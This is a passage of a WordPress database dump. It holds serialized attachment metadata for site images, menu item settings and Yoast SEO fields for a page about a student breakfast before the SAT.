";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Award-Winning-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Award-Winning-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"Award-Winning-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:25:\"Award-Winning-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"Award-Winning-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4250,1125,'_wp_attached_file','2017/09/AACRTrial.png'),(4251,1125,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:21:\"2017/09/AACRTrial.png\";s:5:\"sizes\";a:1:{s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"AACRTrial-150x110.png\";s:5:\"width\";i:150;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4252,1126,'_wp_attached_file','2017/09/AACRTrial2.png'),(4253,1126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:22:\"2017/09/AACRTrial2.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"AACRTrial2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"AACRTrial2-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4267,1130,'_wp_attached_file','2017/09/voterregistration.png'),(4268,1130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:29:\"2017/09/voterregistration.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"voterregistration-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"voterregistration-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"voterregistration-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:29:\"voterregistration-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:29:\"voterregistration-512x300.png\";s:5:\"width\";i:512;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:29:\"voterregistration-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4269,1131,'_wp_attached_file','2017/09/Vote_Wordpress.png'),(4270,1131,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:26:\"2017/09/Vote_Wordpress.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Vote_Wordpress-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"Vote_Wordpress-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4309,1137,'_wp_attached_file','2014/12/founders-vintage.jpg'),(4310,1137,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:275;s:4:\"file\";s:28:\"2014/12/founders-vintage.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"founders-vintage-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"founders-vintage-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"founders-vintage-400x275.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:28:\"founders-vintage-450x275.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:28:\"founders-vintage-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5072,1292,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:650;s:4:\"file\";s:24:\"2018/09/Proclamation.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Proclamation-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Proclamation-300x102.png\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Proclamation-768x260.png\";s:5:\"width\";i:768;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Proclamation-1024x347.png\";s:5:\"width\";i:1024;s:6:\"height\";i:347;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Proclamation-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"Proclamation-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"Proclamation-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"Proclamation-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4324,1141,'_menu_item_type','post_type'),(4325,1141,'_menu_item_menu_item_parent','1287'),(4326,1141,'_menu_item_object_id','781'),(4327,1141,'_menu_item_object','page'),(4328,1141,'_menu_item_target',''),(4329,1141,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4330,1141,'_menu_item_xfn',''),(4331,1141,'_menu_item_url',''),(4333,1142,'_menu_item_type','post_type'),(4334,1142,'_menu_item_menu_item_parent','0'),(4335,1142,'_menu_item_object_id','738'),(4336,1142,'_menu_item_object','page'),(4337,1142,'_menu_item_target',''),(4338,1142,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4339,1142,'_menu_item_xfn',''),(4340,1142,'_menu_item_url',''),(4342,1143,'_menu_item_type','post_type'),(4343,1143,'_menu_item_menu_item_parent','1287'),(4344,1143,'_menu_item_object_id','772'),(4345,1143,'_menu_item_object','page'),(4346,1143,'_menu_item_target',''),(4347,1143,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4348,1143,'_menu_item_xfn',''),(4349,1143,'_menu_item_url',''),(4351,1144,'_menu_item_type','post_type'),(4352,1144,'_menu_item_menu_item_parent','1287'),(4353,1144,'_menu_item_object_id','786'),(4354,1144,'_menu_item_object','page'),(4355,1144,'_menu_item_target',''),(4356,1144,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4357,1144,'_menu_item_xfn',''),(4358,1144,'_menu_item_url',''),(4360,772,'_yoast_wpseo_focuskw_text_input','Breakfast'),(4361,772,'_yoast_wpseo_focuskw','Breakfast'),(4362,772,'_yoast_wpseo_metadesc','Quick and healthy breakfast provided for students before taking the SAT exam.'),(4363,772,'_yoast_wpseo_linkdex','30'),(4364,1145,'_wp_attached_file','2017/01/image1-1.png'),(4365,1145,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2825;s:6:\"height\";i:752;s:4:\"file\";s:20:\"2017/01/image1-1.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"image1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"image1-1-300x80.png\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"image1-1-768x204.png\";s:5:\"width\";i:768;s:6:\"height\";i:204;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"image1-1-1024x273.png\";s:5:\"width\";i:1024;s:6:\"height\";i:273;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"image1-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"image1-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"image1-1-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"image1-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4366,1146,'_wp_attached_file','2017/01/NonDistressedWRuthConwayLogo.png'),(4367,1146,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1384;s:6:\"height\";i:1315;s:4:\"file\";s:40:\"2017/01/NonDistressedWRuthConwayLogo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"NonDistressedWRuthConwayLogo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"NonDistressedWRuthConwayLogo-300x285.png\";s:5:\"width\";i:300;s:6:\"height\";i:285;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"NonDistressedWRuthConwayLogo-768x730.png\";s:5:\"width\";i:768;s:6:\"height\";i:730;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"NonDistressedWRuthConwayLogo-1024x973.png\";s:5:\"width\";i:1024;s:6:\"height\";i:973;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:40:\"NonDistressedWRuthConwayLogo-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:40:\"NonDistressedWRuthConwayLogo-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:40:\"NonDistressedWRuthConwayLogo-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:40:\"NonDistressedWRuthConwayLogo-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4370,1148,'_wp_attached_file','2017/01/1000-1.png'),(4371,1148,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2017/01/1000-1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"1000-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:18:\"1000-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:18:\"1000-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"1000-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4372,1149,'_wp_attached_file','2014/12/zetaword.jpg'),(4373,1149,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:165;s:4:\"file\";s:20:\"2014/12/zetaword.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"zetaword-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"zetaword-300x99.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:99;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"zetaword-400x165.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"zetaword-450x165.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"zetaword-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4376,1151,'_wp_attached_file','2017/09/ZPB_Unified_Visual_Identi-266.jpg'),(4377,1151,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:886;s:6:\"height\";i:98;s:4:\"file\";s:41:\"2017/09/ZPB_Unified_Visual_Identi-266.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"ZPB_Unified_Visual_Identi-266-150x98.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"ZPB_Unified_Visual_Identi-266-300x33.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"ZPB_Unified_Visual_Identi-266-768x85.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:40:\"ZPB_Unified_Visual_Identi-266-400x98.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:40:\"ZPB_Unified_Visual_Identi-266-450x98.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:40:\"ZPB_Unified_Visual_Identi-266-680x98.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:40:\"ZPB_Unified_Visual_Identi-266-180x98.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4378,1153,'_wp_attached_file','2017/01/APPALogo.png'),(4379,1153,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1376;s:6:\"height\";i:650;s:4:\"file\";s:20:\"2017/01/APPALogo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"APPALogo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"APPALogo-300x142.png\";s:5:\"width\";i:300;s:6:\"height\";i:142;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"APPALogo-768x363.png\";s:5:\"width\";i:768;s:6:\"height\";i:363;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"APPALogo-1024x484.png\";s:5:\"width\";i:1024;s:6:\"height\";i:484;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"APPALogo-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"APPALogo-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"APPALogo-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"APPALogo-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4389,1159,'_wp_attached_file','2016/12/Amicette.png'),(4390,1159,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:20:\"2016/12/Amicette.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Amicette-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"Amicette-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4479,1193,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:20:\"2017/10/IMG_1219.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1219-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_1219-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4396,1162,'_wp_attached_file','2017/09/2017FinalZenLogo.png'),(4397,1162,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2944;s:6:\"height\";i:3149;s:4:\"file\";s:28:\"2017/09/2017FinalZenLogo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"2017FinalZenLogo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"2017FinalZenLogo-280x300.png\";s:5:\"width\";i:280;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"2017FinalZenLogo-768x821.png\";s:5:\"width\";i:768;s:6:\"height\";i:821;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"2017FinalZenLogo-957x1024.png\";s:5:\"width\";i:957;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"2017FinalZenLogo-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:28:\"2017FinalZenLogo-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:28:\"2017FinalZenLogo-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:28:\"2017FinalZenLogo-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4398,1163,'_wp_attached_file','2016/11/image1-2.png'),(4399,1163,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2825;s:6:\"height\";i:752;s:4:\"file\";s:20:\"2016/11/image1-2.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"image1-2-150x150.png\";s:5